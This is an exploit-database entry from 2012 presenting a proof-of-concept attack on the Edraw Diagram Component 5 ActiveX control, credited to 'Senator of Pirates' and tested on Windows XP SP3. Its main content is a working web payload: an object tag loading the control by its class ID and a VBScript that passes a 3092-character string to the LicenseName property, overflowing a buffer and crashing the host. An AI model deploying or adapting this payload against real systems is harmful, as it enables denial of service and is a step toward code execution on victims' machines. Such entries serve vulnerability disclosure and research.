Edraw Diagram Component 5 - ActiveX Buffer Overflow (Denial of Service) (PoC)



EKU-ID: 24213 CVE: OSVDB-81483 OSVDB-ID:
Author: Senator of Pirates Published: 2012-02-04 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


Author : Senator of Pirates

This exploit tested on Windows Xp SP3 EN

http://www.edrawsoft.com/download/EDBoardSetup.exe

--------------------------------------------------------------------------------------------------------

<object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype  = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid     = "EDBoardLib.EDBoard"
argCount   = 1

arg1=String(3092, "A")

target.LicenseName = arg1

</script>